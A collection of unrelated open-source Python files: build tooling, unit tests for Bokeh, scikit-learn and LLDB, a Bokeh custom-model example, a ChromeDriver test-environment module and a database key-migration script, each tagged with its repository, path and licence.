self.variables = variables or {}
self.loader = _RecordingFileSystemLoader(loader_base_dir)
self.env = jinja2.Environment(loader=self.loader)
self.env.undefined = jinja2.StrictUndefined
self.env.line_comment_prefix = '##'
self.env.trim_blocks = True
self.env.lstrip_blocks = True
self._template_cache = {} # Map of path -> Template
def Render(self, input_filename, variables=None):
input_rel_path = os.path.relpath(input_filename, self.loader_base_dir)
template = self._template_cache.get(input_rel_path)
if not template:
template = self.env.get_template(input_rel_path)
self._template_cache[input_rel_path] = template
return template.render(variables or self.variables)
def GetLoadedTemplates(self):
return list(self.loader.loaded_templates)
def _ProcessFile(processor, input_filename, output_filename):
output = processor.Render(input_filename)
with codecs.open(output_filename, 'w', 'utf-8') as output_file:
output_file.write(output)
def _ProcessFiles(processor, input_filenames, inputs_base_dir, outputs_zip):
with build_utils.TempDir() as temp_dir:
for input_filename in input_filenames:
relpath = os.path.relpath(os.path.abspath(input_filename),
os.path.abspath(inputs_base_dir))
if relpath.startswith(os.pardir):
raise Exception('input file %s is not contained in inputs base dir %s'
% (input_filename, inputs_base_dir))
output_filename = os.path.join(temp_dir, relpath)
parent_dir = os.path.dirname(output_filename)
build_utils.MakeDirectory(parent_dir)
_ProcessFile(processor, input_filename, output_filename)
build_utils.ZipDir(outputs_zip, temp_dir)
def _ParseVariables(variables_arg, error_func):
variables = {}
for v in build_utils.ParseGnList(variables_arg):
if '=' not in v:
error_func('--variables argument must contain "=": ' + v)
name, _, value = v.partition('=')
variables[name] = value
return variables
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--inputs', required=True,
help='The template files to process.')
parser.add_argument('--output', help='The output file to generate. Valid '
'only if there is a single input.')
parser.add_argument('--outputs-zip', help='A zip file for the processed '
'templates. Required if there are multiple inputs.')
parser.add_argument('--inputs-base-dir', help='A common ancestor directory '
'of the inputs. Each output\'s path in the output zip '
'will match the relative path from INPUTS_BASE_DIR to '
'the input. Required if --output-zip is given.')
parser.add_argument('--loader-base-dir', help='Base path used by the '
'template loader. Must be a common ancestor directory of '
'the inputs. Defaults to DIR_SOURCE_ROOT.',
default=host_paths.DIR_SOURCE_ROOT)
parser.add_argument('--variables', help='Variables to be made available in '
'the template processing environment, as a GYP list '
'(e.g. --variables "channel=beta mstone=39")', default='')
build_utils.AddDepfileOption(parser)
options = parser.parse_args()
inputs = build_utils.ParseGnList(options.inputs)
if (options.output is None) == (options.outputs_zip is None):
parser.error('Exactly one of --output and --output-zip must be given')
if options.output and len(inputs) != 1:
parser.error('--output cannot be used with multiple inputs')
if options.outputs_zip and not options.inputs_base_dir:
parser.error('--inputs-base-dir must be given when --output-zip is used')
variables = _ParseVariables(options.variables, parser.error)
processor = JinjaProcessor(options.loader_base_dir, variables=variables)
if options.output:
_ProcessFile(processor, inputs[0], options.output)
else:
_ProcessFiles(processor, inputs, options.inputs_base_dir,
options.outputs_zip)
if options.depfile:
output = options.output or options.outputs_zip
deps = processor.GetLoadedTemplates()
build_utils.WriteDepfile(options.depfile, output, deps)
if __name__ == '__main__':
main()
|
chrisdickinson/nojs
|
build/android/gyp/jinja_template.py
|
Python
|
bsd-3-clause
| 5,601
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2018, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from mock import patch
# External imports
from six import string_types
# Bokeh imports
# Module under test
import bokeh.client.session as bcs
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_module_docstring_warning():
assert bcs._BOKEH_CLIENT_APP_WARNING_BODY in bcs.__doc__
def test_DEFAULT_SESSION_ID():
assert bcs.DEFAULT_SESSION_ID == "default"
def test_DEFAULT_SERVER_WEBSOCKET_URL():
assert bcs.DEFAULT_SERVER_WEBSOCKET_URL == "ws://localhost:5006/ws"
class Test_ClientSession(object):
def test_creation_defaults(self):
s = bcs.ClientSession()
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_session_id(self):
s = bcs.ClientSession("sid")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s.id == "sid"
def test_creation_with_ws_url(self):
s = bcs.ClientSession(websocket_url="wsurl")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s._connection.url == "wsurl"
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_ioloop(self):
s = bcs.ClientSession(io_loop="io_loop")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s._connection.io_loop == "io_loop"
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_arguments(self):
s = bcs.ClientSession(arguments="args")
assert s.connected == False
assert s.document is None
assert s._connection._arguments == "args"
assert len(s.id) == 44
@patch("bokeh.client.connection.ClientConnection.connect")
def test_connect(self, mock_connect):
s = bcs.ClientSession()
s.connect()
assert mock_connect.call_count == 1
assert mock_connect.call_args[0] == ()
assert mock_connect.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_close(self, mock_close):
s = bcs.ClientSession()
s.close()
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("closed",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_context_manager(self, mock_close):
with bcs.ClientSession() as session:
assert isinstance(session, bcs.ClientSession)
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("closed",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.close")
def test_close_with_why(self, mock_close):
s = bcs.ClientSession()
s.close("foo")
assert mock_close.call_count == 1
assert mock_close.call_args[0] == ("foo",)
assert mock_close.call_args[1] == {}
@patch("bokeh.client.connection.ClientConnection.force_roundtrip")
def test_force_roundtrip(self, mock_force_roundtrip):
s = bcs.ClientSession()
s.force_roundtrip()
assert mock_force_roundtrip.call_count == 1
assert mock_force_roundtrip.call_args[0] == ()
assert mock_force_roundtrip.call_args[1] == {}
@patch("warnings.warn")
@patch("bokeh.client.connection.ClientConnection.loop_until_closed")
def test_loop_until_closed(self, mock_loop_until_closed, mock_warn):
s = bcs.ClientSession()
s.loop_until_closed()
assert mock_loop_until_closed.call_count == 1
assert mock_loop_until_closed.call_args[0] == ()
assert mock_loop_until_closed.call_args[1] == {}
assert mock_warn.call_count == 1
assert mock_warn.call_args[0] == (bcs._BOKEH_CLIENT_APP_WARNING_FULL,)
assert mock_warn.call_args[1] == {}
@patch("warnings.warn")
@patch("bokeh.client.connection.ClientConnection.loop_until_closed")
def test_loop_until_closed_suppress_warnings(self, mock_loop_until_closed, mock_warn):
s = bcs.ClientSession()
s.loop_until_closed(True)
assert mock_loop_until_closed.call_count == 1
assert mock_loop_until_closed.call_args[0] == ()
assert mock_loop_until_closed.call_args[1] == {}
assert mock_warn.call_count == 0
@patch("bokeh.client.connection.ClientConnection.request_server_info")
def test_request_server_info(self, mock_request_server_info):
s = bcs.ClientSession()
s.request_server_info()
assert mock_request_server_info.call_count == 1
assert mock_request_server_info.call_args[0] == ()
assert mock_request_server_info.call_args[1] == {}
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
mindriot101/bokeh
|
bokeh/client/tests/test_session.py
|
Python
|
bsd-3-clause
| 6,568
|
import pickle
import tempfile
import shutil
import os
import numbers
import numpy as np
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raises_regexp
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import ignore_warnings
from sklearn.utils.testing import assert_not_equal
from sklearn.utils.testing import assert_warns_message
from sklearn.base import BaseEstimator
from sklearn.metrics import (f1_score, r2_score, roc_auc_score, fbeta_score,
log_loss, precision_score, recall_score)
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.metrics.scorer import (check_scoring, _PredictScorer,
_passthrough_scorer)
from sklearn.metrics import make_scorer, get_scorer, SCORERS
from sklearn.svm import LinearSVC
from sklearn.pipeline import make_pipeline
from sklearn.cluster import KMeans
from sklearn.dummy import DummyRegressor
from sklearn.linear_model import Ridge, LogisticRegression
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.datasets import make_blobs
from sklearn.datasets import make_classification
from sklearn.datasets import make_multilabel_classification
from sklearn.datasets import load_diabetes
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.multiclass import OneVsRestClassifier
from sklearn.externals import joblib
REGRESSION_SCORERS = ['r2', 'neg_mean_absolute_error',
'neg_mean_squared_error', 'neg_mean_squared_log_error',
'neg_median_absolute_error', 'mean_absolute_error',
'mean_squared_error', 'median_absolute_error']
CLF_SCORERS = ['accuracy', 'f1', 'f1_weighted', 'f1_macro', 'f1_micro',
'roc_auc', 'average_precision', 'precision',
'precision_weighted', 'precision_macro', 'precision_micro',
'recall', 'recall_weighted', 'recall_macro', 'recall_micro',
'neg_log_loss', 'log_loss',
'adjusted_rand_score' # not really, but works
]
MULTILABEL_ONLY_SCORERS = ['precision_samples', 'recall_samples', 'f1_samples']
def _make_estimators(X_train, y_train, y_ml_train):
# Make estimators that make sense to test various scoring methods
sensible_regr = DummyRegressor(strategy='median')
sensible_regr.fit(X_train, y_train)
sensible_clf = DecisionTreeClassifier(random_state=0)
sensible_clf.fit(X_train, y_train)
sensible_ml_clf = DecisionTreeClassifier(random_state=0)
sensible_ml_clf.fit(X_train, y_ml_train)
return dict(
[(name, sensible_regr) for name in REGRESSION_SCORERS] +
[(name, sensible_clf) for name in CLF_SCORERS] +
[(name, sensible_ml_clf) for name in MULTILABEL_ONLY_SCORERS]
)
X_mm, y_mm, y_ml_mm = None, None, None
ESTIMATORS = None
TEMP_FOLDER = None
def setup_module():
# Create some memory mapped data
global X_mm, y_mm, y_ml_mm, TEMP_FOLDER, ESTIMATORS
TEMP_FOLDER = tempfile.mkdtemp(prefix='sklearn_test_score_objects_')
X, y = make_classification(n_samples=30, n_features=5, random_state=0)
_, y_ml = make_multilabel_classification(n_samples=X.shape[0],
random_state=0)
filename = os.path.join(TEMP_FOLDER, 'test_data.pkl')
joblib.dump((X, y, y_ml), filename)
X_mm, y_mm, y_ml_mm = joblib.load(filename, mmap_mode='r')
ESTIMATORS = _make_estimators(X_mm, y_mm, y_ml_mm)
def teardown_module():
global X_mm, y_mm, y_ml_mm, TEMP_FOLDER, ESTIMATORS
# GC closes the mmap file descriptors
X_mm, y_mm, y_ml_mm, ESTIMATORS = None, None, None, None
shutil.rmtree(TEMP_FOLDER)
class EstimatorWithoutFit(object):
"""Dummy estimator to test check_scoring"""
pass
class EstimatorWithFit(BaseEstimator):
"""Dummy estimator to test check_scoring"""
def fit(self, X, y):
return self
class EstimatorWithFitAndScore(object):
"""Dummy estimator to test check_scoring"""
def fit(self, X, y):
return self
def score(self, X, y):
return 1.0
class EstimatorWithFitAndPredict(object):
"""Dummy estimator to test check_scoring"""
def fit(self, X, y):
self.y = y
return self
def predict(self, X):
return self.y
class DummyScorer(object):
"""Dummy scorer that always returns 1."""
def __call__(self, est, X, y):
return 1
def test_all_scorers_repr():
# Test that all scorers have a working repr
for name, scorer in SCORERS.items():
repr(scorer)
def test_check_scoring():
# Test all branches of check_scoring
estimator = EstimatorWithoutFit()
pattern = (r"estimator should be an estimator implementing 'fit' method,"
r" .* was passed")
assert_raises_regexp(TypeError, pattern, check_scoring, estimator)
estimator = EstimatorWithFitAndScore()
estimator.fit([[1]], [1])
scorer = check_scoring(estimator)
assert_true(scorer is _passthrough_scorer)
assert_almost_equal(scorer(estimator, [[1]], [1]), 1.0)
estimator = EstimatorWithFitAndPredict()
estimator.fit([[1]], [1])
pattern = (r"If no scoring is specified, the estimator passed should have"
r" a 'score' method\. The estimator .* does not\.")
assert_raises_regexp(TypeError, pattern, check_scoring, estimator)
scorer = check_scoring(estimator, "accuracy")
assert_almost_equal(scorer(estimator, [[1]], [1]), 1.0)
estimator = EstimatorWithFit()
scorer = check_scoring(estimator, "accuracy")
assert_true(isinstance(scorer, _PredictScorer))
estimator = EstimatorWithFit()
scorer = check_scoring(estimator, allow_none=True)
assert_true(scorer is None)
def test_check_scoring_gridsearchcv():
# test that check_scoring works on GridSearchCV and pipeline.
# slightly redundant non-regression test.
grid = GridSearchCV(LinearSVC(), param_grid={'C': [.1, 1]})
scorer = check_scoring(grid, "f1")
assert_true(isinstance(scorer, _PredictScorer))
pipe = make_pipeline(LinearSVC())
scorer = check_scoring(pipe, "f1")
assert_true(isinstance(scorer, _PredictScorer))
# check that cross_val_score definitely calls the scorer
# and doesn't make any assumptions about the estimator apart from having a
# fit.
scores = cross_val_score(EstimatorWithFit(), [[1], [2], [3]], [1, 0, 1],
scoring=DummyScorer())
assert_array_equal(scores, 1)
def test_make_scorer():
# Sanity check on the make_scorer factory function.
f = lambda *args: 0
assert_raises(ValueError, make_scorer, f, needs_threshold=True,
needs_proba=True)
def test_classification_scores():
# Test classification scorers.
X, y = make_blobs(random_state=0, centers=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = LinearSVC(random_state=0)
clf.fit(X_train, y_train)
for prefix, metric in [('f1', f1_score), ('precision', precision_score),
('recall', recall_score)]:
score1 = get_scorer('%s_weighted' % prefix)(clf, X_test, y_test)
score2 = metric(y_test, clf.predict(X_test), pos_label=None,
average='weighted')
assert_almost_equal(score1, score2)
score1 = get_scorer('%s_macro' % prefix)(clf, X_test, y_test)
score2 = metric(y_test, clf.predict(X_test), pos_label=None,
average='macro')
assert_almost_equal(score1, score2)
score1 = get_scorer('%s_micro' % prefix)(clf, X_test, y_test)
score2 = metric(y_test, clf.predict(X_test), pos_label=None,
average='micro')
assert_almost_equal(score1, score2)
score1 = get_scorer('%s' % prefix)(clf, X_test, y_test)
score2 = metric(y_test, clf.predict(X_test), pos_label=1)
assert_almost_equal(score1, score2)
# test fbeta score that takes an argument
scorer = make_scorer(fbeta_score, beta=2)
score1 = scorer(clf, X_test, y_test)
score2 = fbeta_score(y_test, clf.predict(X_test), beta=2)
assert_almost_equal(score1, score2)
# test that custom scorer can be pickled
unpickled_scorer = pickle.loads(pickle.dumps(scorer))
score3 = unpickled_scorer(clf, X_test, y_test)
assert_almost_equal(score1, score3)
# smoke test the repr:
repr(fbeta_score)
def test_regression_scorers():
# Test regression scorers.
diabetes = load_diabetes()
X, y = diabetes.data, diabetes.target
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = Ridge()
clf.fit(X_train, y_train)
score1 = get_scorer('r2')(clf, X_test, y_test)
score2 = r2_score(y_test, clf.predict(X_test))
assert_almost_equal(score1, score2)
def test_thresholded_scorers():
# Test scorers that take thresholds.
X, y = make_blobs(random_state=0, centers=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = LogisticRegression(random_state=0)
clf.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, clf.decision_function(X_test))
score3 = roc_auc_score(y_test, clf.predict_proba(X_test)[:, 1])
assert_almost_equal(score1, score2)
assert_almost_equal(score1, score3)
logscore = get_scorer('neg_log_loss')(clf, X_test, y_test)
logloss = log_loss(y_test, clf.predict_proba(X_test))
assert_almost_equal(-logscore, logloss)
# same for an estimator without decision_function
clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, clf.predict_proba(X_test)[:, 1])
assert_almost_equal(score1, score2)
# test with a regressor (no decision_function)
reg = DecisionTreeRegressor()
reg.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(reg, X_test, y_test)
score2 = roc_auc_score(y_test, reg.predict(X_test))
assert_almost_equal(score1, score2)
# Test that an exception is raised on more than two classes
X, y = make_blobs(random_state=0, centers=3)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf.fit(X_train, y_train)
assert_raises(ValueError, get_scorer('roc_auc'), clf, X_test, y_test)
def test_thresholded_scorers_multilabel_indicator_data():
# Test that the scorer work with multilabel-indicator format
# for multilabel and multi-output multi-class classifier
X, y = make_multilabel_classification(allow_unlabeled=False,
random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
# Multi-output multi-class predict_proba
clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)
y_proba = clf.predict_proba(X_test)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, np.vstack(p[:, -1] for p in y_proba).T)
assert_almost_equal(score1, score2)
# Multi-output multi-class decision_function
# TODO Is there any yet?
clf = DecisionTreeClassifier()
clf.fit(X_train, y_train)
clf._predict_proba = clf.predict_proba
clf.predict_proba = None
clf.decision_function = lambda X: [p[:, 1] for p in clf._predict_proba(X)]
y_proba = clf.decision_function(X_test)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, np.vstack(p for p in y_proba).T)
assert_almost_equal(score1, score2)
# Multilabel predict_proba
clf = OneVsRestClassifier(DecisionTreeClassifier())
clf.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, clf.predict_proba(X_test))
assert_almost_equal(score1, score2)
# Multilabel decision function
clf = OneVsRestClassifier(LinearSVC(random_state=0))
clf.fit(X_train, y_train)
score1 = get_scorer('roc_auc')(clf, X_test, y_test)
score2 = roc_auc_score(y_test, clf.decision_function(X_test))
assert_almost_equal(score1, score2)
def test_unsupervised_scorers():
# Test clustering scorers against gold standard labeling.
# We don't have any real unsupervised Scorers yet.
X, y = make_blobs(random_state=0, centers=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
km = KMeans(n_clusters=3)
km.fit(X_train)
score1 = get_scorer('adjusted_rand_score')(km, X_test, y_test)
score2 = adjusted_rand_score(y_test, km.predict(X_test))
assert_almost_equal(score1, score2)
@ignore_warnings
def test_raises_on_score_list():
# Test that when a list of scores is returned, we raise proper errors.
X, y = make_blobs(random_state=0)
f1_scorer_no_average = make_scorer(f1_score, average=None)
clf = DecisionTreeClassifier()
assert_raises(ValueError, cross_val_score, clf, X, y,
scoring=f1_scorer_no_average)
grid_search = GridSearchCV(clf, scoring=f1_scorer_no_average,
param_grid={'max_depth': [1, 2]})
assert_raises(ValueError, grid_search.fit, X, y)
@ignore_warnings
def test_scorer_sample_weight():
# Test that scorers support sample_weight or raise sensible errors
# Unlike the metrics invariance test, in the scorer case it's harder
# to ensure that, on the classifier output, weighted and unweighted
# scores really should be unequal.
X, y = make_classification(random_state=0)
_, y_ml = make_multilabel_classification(n_samples=X.shape[0],
random_state=0)
split = train_test_split(X, y, y_ml, random_state=0)
X_train, X_test, y_train, y_test, y_ml_train, y_ml_test = split
sample_weight = np.ones_like(y_test)
sample_weight[:10] = 0
# get sensible estimators for each metric
estimator = _make_estimators(X_train, y_train, y_ml_train)
for name, scorer in SCORERS.items():
if name in MULTILABEL_ONLY_SCORERS:
target = y_ml_test
else:
target = y_test
try:
weighted = scorer(estimator[name], X_test, target,
sample_weight=sample_weight)
ignored = scorer(estimator[name], X_test[10:], target[10:])
unweighted = scorer(estimator[name], X_test, target)
assert_not_equal(weighted, unweighted,
msg="scorer {0} behaves identically when "
"called with sample weights: {1} vs "
"{2}".format(name, weighted, unweighted))
assert_almost_equal(weighted, ignored,
err_msg="scorer {0} behaves differently when "
"ignoring samples and setting sample_weight to"
" 0: {1} vs {2}".format(name, weighted,
ignored))
except TypeError as e:
assert_true("sample_weight" in str(e),
"scorer {0} raises unhelpful exception when called "
"with sample weights: {1}".format(name, str(e)))
@ignore_warnings # UndefinedMetricWarning for P / R scores
def check_scorer_memmap(scorer_name):
scorer, estimator = SCORERS[scorer_name], ESTIMATORS[scorer_name]
if scorer_name in MULTILABEL_ONLY_SCORERS:
score = scorer(estimator, X_mm, y_ml_mm)
else:
score = scorer(estimator, X_mm, y_mm)
assert isinstance(score, numbers.Number), scorer_name
def test_scorer_memmap_input():
# Non-regression test for #6147: some score functions would
# return singleton memmap when computed on memmap data instead of scalar
# float values.
for name in SCORERS.keys():
yield check_scorer_memmap, name
def test_deprecated_names():
X, y = make_blobs(random_state=0, centers=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = LogisticRegression(random_state=0)
clf.fit(X_train, y_train)
for name in ('mean_absolute_error', 'mean_squared_error',
'median_absolute_error', 'log_loss'):
warning_msg = "Scoring method %s was renamed to" % name
for scorer in (get_scorer(name), SCORERS[name]):
assert_warns_message(DeprecationWarning,
warning_msg,
scorer, clf, X, y)
assert_warns_message(DeprecationWarning,
warning_msg,
cross_val_score, clf, X, y, scoring=name)
def test_scoring_is_not_metric():
assert_raises_regexp(ValueError, 'make_scorer', check_scoring,
LogisticRegression(), f1_score)
assert_raises_regexp(ValueError, 'make_scorer', check_scoring,
LogisticRegression(), roc_auc_score)
assert_raises_regexp(ValueError, 'make_scorer', check_scoring,
Ridge(), r2_score)
assert_raises_regexp(ValueError, 'make_scorer', check_scoring,
KMeans(), adjusted_rand_score)
|
meduz/scikit-learn
|
sklearn/metrics/tests/test_score_objects.py
|
Python
|
bsd-3-clause
| 17,473
|
"""Test that types defined in shared libraries work correctly."""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestRealDefinition(TestBase):
mydir = TestBase.compute_mydir(__file__)
@skipUnlessDarwin
def test_frame_var_after_stop_at_implementation(self):
"""Test that we can find the implementation for an objective C type"""
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
self.build()
self.shlib_names = ["libTestExt.dylib", "libTest.dylib"]
self.common_setup()
line = line_number('TestExt/TestExt.m', '// break here')
lldbutil.run_break_set_by_file_and_line(
self, 'TestExt.m', line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# This should display correctly.
self.expect(
"expr 42",
"A simple expression should execute correctly",
substrs=[
"42"])
def common_setup(self):
exe = self.getBuildArtifact("a.out")
target = self.dbg.CreateTarget(exe)
self.registerSharedLibrariesWithTarget(target, self.shlib_names)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
|
endlessm/chromium-browser
|
third_party/llvm/lldb/test/API/lang/objc/conflicting-definition/TestConflictingDefinition.py
|
Python
|
bsd-3-clause
| 1,681
|
from __future__ import print_function
from bokeh.core.properties import String
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.models.callbacks import Callback
from bokeh.models.glyphs import Circle
from bokeh.models import Plot, DataRange1d, LinearAxis, ColumnDataSource, PanTool, WheelZoomTool, TapTool
from bokeh.models.layouts import HBox
from bokeh.resources import INLINE
from bokeh.util.browser import view
class Popup(Callback):
__implementation__ = """
_ = require "underscore"
Util = require "util/util"
Model = require "model"
p = require "core/properties"
class Popup extends Model
type: "Popup"
execute: (data_source) ->
for i in Util.get_indices(data_source)
message = Util.replace_placeholders(@get("message"), data_source, i)
window.alert(message)
null
@define {
message: [ p.String, "" ]
}
module.exports =
Model: Popup
"""
message = String("", help="""
Message to display in a popup window. This can be a template string,
which will be formatted with data from the data source.
""")
class MyHBox(HBox):
__implementation__ = """
HBox = require "models/layouts/hbox"
class MyHBoxView extends HBox.View
render: () ->
super()
@$el.css({border: "5px solid black"})
class MyHBox extends HBox.Model
type: "MyHBox"
default_view: MyHBoxView
module.exports = {
Model: MyHBox
View: MyHBoxView
}
"""
source = ColumnDataSource(
data = dict(
x = [1, 2, 3, 4, 4, 5, 5],
y = [5, 4, 3, 2, 2.1, 1, 1.1],
color = ["rgb(0, 100, 120)", "green", "blue", "#2c7fb8", "#2c7fb8", "rgba(120, 230, 150, 0.5)", "rgba(120, 230, 150, 0.5)"]
)
)
xdr = DataRange1d()
ydr = DataRange1d()
plot = Plot(x_range=xdr, y_range=ydr)
circle = Circle(x="x", y="y", radius=0.2, fill_color="color", line_color="black")
circle_renderer = plot.add_glyph(source, circle)
plot.add_layout(LinearAxis(), 'below')
plot.add_layout(LinearAxis(), 'left')
tap = TapTool(renderers=[circle_renderer], callback=Popup(message="Selected color: @color"))
plot.add_tools(PanTool(), WheelZoomTool(), tap)
doc = Document()
doc.add_root(MyHBox(children=[plot]))
if __name__ == "__main__":
filename = "custom.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Demonstration of user-defined models"))
print("Wrote %s" % filename)
view(filename)
|
pombredanne/bokeh
|
examples/models/custom.py
|
Python
|
bsd-3-clause
| 2,401
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""TestEnvironment classes.
These classes abstract away the various setups needed to run the WebDriver java
tests in various environments.
"""
from __future__ import absolute_import
import logging
import os
import sys
import chrome_paths
import util
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
if util.IsLinux():
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'third_party',
'catapult', 'devil'))
from devil.android import device_errors
from devil.android import device_utils
from devil.android import forwarder
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android'))
import devil_chromium
ANDROID_TEST_HTTP_PORT = 2311
ANDROID_TEST_HTTPS_PORT = 2411
_EXPECTATIONS = {}
exec(compile(open(os.path.join(_THIS_DIR, 'test_expectations'), "rb").read(), \
os.path.join(_THIS_DIR, 'test_expectations'), 'exec'), _EXPECTATIONS)
class BaseTestEnvironment(object):
"""Manages the environment java tests require to run."""
def __init__(self, chrome_version='HEAD'):
"""Initializes a desktop test environment.
Args:
chrome_version: Optionally a chrome version to run the tests against.
"""
self._chrome_version = chrome_version
def GetOS(self):
"""Name of the OS."""
raise NotImplementedError
def GlobalSetUp(self):
"""Sets up the global test environment state."""
pass
def GlobalTearDown(self):
"""Tears down the global test environment state."""
pass
def GetDisabledJavaTestMatchers(self):
"""Get the list of disabled java test matchers.
Returns:
List of disabled test matchers, which may contain '*' wildcards.
"""
return _EXPECTATIONS['GetDisabledTestMatchers'](self.GetOS())
def GetReadyToRunJavaTestMatchers(self):
"""Get the list of disabled for Chrome java test matchers
but which already works.
Returns:
List of disabled for Chrome java test matchers
but which already works.
"""
return _EXPECTATIONS['GetReadyToRunTestMatchers']()
def GetPassedJavaTests(self):
"""Get the list of passed java tests.
Returns:
List of passed test names.
"""
with open(os.path.join(_THIS_DIR, 'java_tests.txt'), 'r') as f:
return _EXPECTATIONS['ApplyJavaTestFilter'](
self.GetOS(), [t.strip('\n') for t in f.readlines()])
class DesktopTestEnvironment(BaseTestEnvironment):
"""Manages the environment java tests require to run on Desktop."""
# override
def GetOS(self):
return util.GetPlatformName()
class AndroidTestEnvironment(DesktopTestEnvironment):
"""Manages the environment java tests require to run on Android."""
def __init__(self, package, chrome_version='HEAD'):
super(AndroidTestEnvironment, self).__init__(chrome_version)
self._package = package
self._device = None
self._forwarder = None
# override
def GlobalSetUp(self):
devil_chromium.Initialize()
os.putenv('TEST_HTTP_PORT', str(ANDROID_TEST_HTTP_PORT))
os.putenv('TEST_HTTPS_PORT', str(ANDROID_TEST_HTTPS_PORT))
devices = device_utils.DeviceUtils.HealthyDevices()
if not devices:
raise device_errors.NoDevicesError()
elif len(devices) > 1:
logging.warning('Multiple devices attached. Using %s.' % devices[0])
self._device = devices[0]
forwarder.Forwarder.Map(
[(ANDROID_TEST_HTTP_PORT, ANDROID_TEST_HTTP_PORT),
(ANDROID_TEST_HTTPS_PORT, ANDROID_TEST_HTTPS_PORT)],
self._device)
# override
def GlobalTearDown(self):
if self._device:
forwarder.Forwarder.UnmapAllDevicePorts(self._device)
# override
def GetOS(self):
return 'android:%s' % self._package
|
ric2b/Vivaldi-browser
|
chromium/chrome/test/chromedriver/test/test_environment.py
|
Python
|
bsd-3-clause
| 3,855
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import *
import emission.core.get_database as edb
def fix_key(check_field, new_key):
print("First entry for "+new_key+" is %s" % list(edb.get_timeseries_db().find(
{"metadata.key": "config/sensor_config",
check_field: {"$exists": True}}).sort(
"metadata/write_ts").limit(1)))
udb = edb.get_usercache_db()
tdb = edb.get_timeseries_db()
for i, entry in enumerate(edb.get_timeseries_db().find(
{"metadata.key": "config/sensor_config",
check_field: {"$exists": True}})):
entry["metadata"]["key"] = new_key
if i % 10000 == 0:
print(udb.insert(entry))
print(tdb.remove(entry["_id"]))
else:
udb.insert(entry)
tdb.remove(entry["_id"])
fix_key("data.battery_status", "background/battery")
fix_key("data.latitude", "background/location")
fix_key("data.zzaEh", "background/motion_activity")
fix_key("data.currState", "statemachine/transition")
|
e-mission/e-mission-server
|
bin/historical/fix_sensor_config_key.py
|
Python
|
bsd-3-clause
| 1,342
|
# $Id$
#
# Copyright (c) 2007, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
